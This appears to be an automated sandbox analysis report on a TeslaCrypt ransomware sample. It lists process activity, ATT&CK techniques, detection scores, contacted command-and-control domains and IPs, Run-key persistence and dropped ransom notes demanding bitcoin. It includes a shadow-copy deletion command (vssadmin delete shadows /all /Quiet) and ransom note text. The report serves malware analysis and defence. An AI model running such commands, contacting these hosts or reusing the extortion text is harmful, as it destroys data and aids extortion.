            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Process created: C:\Users\user\AppData\Roaming\mllvvvh.exe C:\Users\user\AppData\Roaming\mllvvvh.exe
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Process created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Process created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_0041F3E0 CoInitializeEx,GdiplusStartup,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,_memset,GetVersionExW,CreateThread,_memset,__wfopen_s,_fprintf,GdipAlloc,GdipCreateBitmapFromHBITMAP,CreateThread,SetThreadPriority,WaitForSingleObject,_memset,GdipSaveImageToFile
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\safecrypt.exe; Code function: 1_2_0042BCE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Native API 4 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
            Default Accounts | Command and Scripting Interpreter 2 | Registry Run Keys / Startup Folder 111 | Application Shimming 1 | Obfuscated Files or Information 3 | LSASS Memory | File and Directory Discovery 3 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Inhibit System Recovery 1
            Domain Accounts | At (Linux) | Logon Script (Windows) | Access Token Manipulation 1 | Software Packing 22 | Security Account Manager | System Information Discovery 14 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Process Injection 211 | File Deletion 1 | NTDS | Security Software Discovery 141 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Registry Run Keys / Startup Folder 111 | Masquerading 1 | LSA Secrets | Virtualization/Sandbox Evasion 21 | SSH | Keylogging | Data Transfer Size Limits | Proxy 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 21 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 211 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 2 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

            [Figure: behavior graph. ID: 375304; Sample: safecrypt.exe; Start date: 24/03/2021; Architecture: WINDOWS; Score: 100]


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            safecrypt.exe | 92% | Virustotal |
            safecrypt.exe | 74% | Metadefender |
            safecrypt.exe | 96% | ReversingLabs | Win32.Ransomware.TeslaCrypt
            safecrypt.exe | 100% | Avira | HEUR/AGEN.1124982
            safecrypt.exe | 100% | Joe Sandbox ML |

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\mllvvvh.exe | 74% | Metadefender |
            C:\Users\user\AppData\Roaming\mllvvvh.exe | 96% | ReversingLabs | Win32.Ransomware.TeslaCrypt

            Unpacked PE Files

            Source | Detection | Scanner | Label
            25.0.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            1.1.safecrypt.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1101649
            18.2.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            4.0.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            24.2.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            22.2.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            2.0.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            18.3.mllvvvh.exe.2900000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            20.2.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1101649
            24.0.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            0.2.safecrypt.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            23.0.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            4.1.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1101649
            1.2.safecrypt.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1101649
            0.3.safecrypt.exe.2910000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            22.0.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            25.2.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1101649
            20.0.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            1.0.safecrypt.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            2.2.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            0.0.safecrypt.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            23.1.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1101649
            18.0.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            24.3.mllvvvh.exe.2900000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            22.3.mllvvvh.exe.2930000.0.unpack | 100% | Avira | HEUR/AGEN.1124982
            23.2.mllvvvh.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1101649
            2.3.mllvvvh.exe.27c0000.0.unpack | 100% | Avira | HEUR/AGEN.1124982

            Domains

            Source | Detection | Scanner | Label
            iicsdrd.com | 5% | Virustotal |
            educarpetas.com | 2% | Virustotal |
            bddadmin.desjardins.fr | 2% | Virustotal |
            southinstrument.org | 5% | Virustotal |

            URLs


            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            iicsdrd.com | 52.60.87.163 | true | true | | unknown
            educarpetas.com | 185.53.178.54 | true | true | | unknown
            bddadmin.desjardins.fr | 176.74.179.58 | true | false | | unknown
            southinstrument.org | unknown | unknown | false | | unknown
            dunyamuzelerimuzesi.com | unknown | unknown | false | | unknown
            grant-pro.com | unknown | unknown | false | | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://iicsdrd.com/tmp/mzsys.php | true | Avira URL Cloud: safe | unknown

                URLs from Memory and Binaries


                  Contacted IPs


                  Public

                  IP | Domain | Country | ASN | ASN Name | Malicious
                  185.53.178.54 | educarpetas.com | Germany | 61969 | TEAMINTERNET-ASDE | true
                  52.60.87.163 | iicsdrd.com | United States | 16509 | AMAZON-02US | true
                  176.74.179.58 | bddadmin.desjardins.fr | United Kingdom | 6640 | CENTURYLINK-TIER3-CLOUDUS | false

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:375304
                  Start date:24.03.2021
                  Start time:18:30:04
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 13m 29s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:safecrypt.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:30
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.rans.evad.winEXE@37/1004@6/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 38.1% (good quality ratio 33.4%)
                  • Quality average: 71.1%
                  • Quality standard deviation: 34.3%
                  HCA Information:
                  • Successful, ratio: 93%
                  • Number of executed functions: 309
                  • Number of non-executed functions: 43
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, VSSVC.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.147.198.201, 168.61.161.212, 52.255.188.83, 104.42.151.234, 23.0.174.200, 23.0.174.185, 40.88.32.150, 8.241.78.126, 8.241.88.254, 8.238.29.254, 8.241.90.254, 8.238.36.254, 95.100.54.203
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, 2-01-3cf7-0009.cdx.cedexis.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, download.windowsupdate.com.edgesuite.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Report size getting too big, too many NtWriteFile calls found.

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  18:30:52 | API Interceptor | 1x Sleep call for process: safecrypt.exe modified
                  18:30:55 | API Interceptor | 4x Sleep call for process: mllvvvh.exe modified
                  18:30:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010 C:\Users\user\AppData\Roaming\mllvvvh.exe
                  18:31:05 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010 C:\Users\user\AppData\Roaming\mllvvvh.exe
                  18:31:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run gatert-12010 C:\Users\user\AppData\Roaming\mllvvvh.exe

                  Joe Sandbox View / Context

                  IPs

                  Match | Associated Sample Name / URL | Detection | Context
                  185.53.178.54 | Confirmation copy 112WSDGB.exe | malicious | www.creditoefectivo.info/3iw/?k2JLtP=m78xn5oMN8wnMfaX70UQPP8GL31woTtozaaF8RlJKmGfLr7wp/RwXdgcuT/KgNqIW69L&OZQliB=H0Dlqv
                  | Quote111.exe | malicious | www.apowersof.com/r7m/
                  52.60.87.163 | AT113020.exe | malicious | www.makingdoathome.com/9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p

                  Domains

                  No context

                  ASN


                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:true
                  C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:false
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:false
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:false
                  C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  C:\$Recycle.Bin\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  C:\$Recycle.Bin\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:false
                  C:\$Recycle.Bin\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  C:\ProgramData\Adobe\ARM\Reader_19.012.20034\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):78560
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkL
                  MD5:255785AADBA44754EE1B63659569BFBB
                  SHA1:0E95D2D4FA14C16D35B8C2F71FE7336631429F2D
                  SHA-256:A6507608270716E4B1A7F632B8EFD8CDD9FF3B44543355B12EF538D9C9BB6C3C
                  SHA-512:647626038514BAA96B3ECB45954E7D7F51B2522F1FC0F675FD43EB27DAC650ECB25DA819C1C81276ED26E5B3465D4E109D48FC3CC51350D65E9FB34195ECC4A9
                  Malicious:false
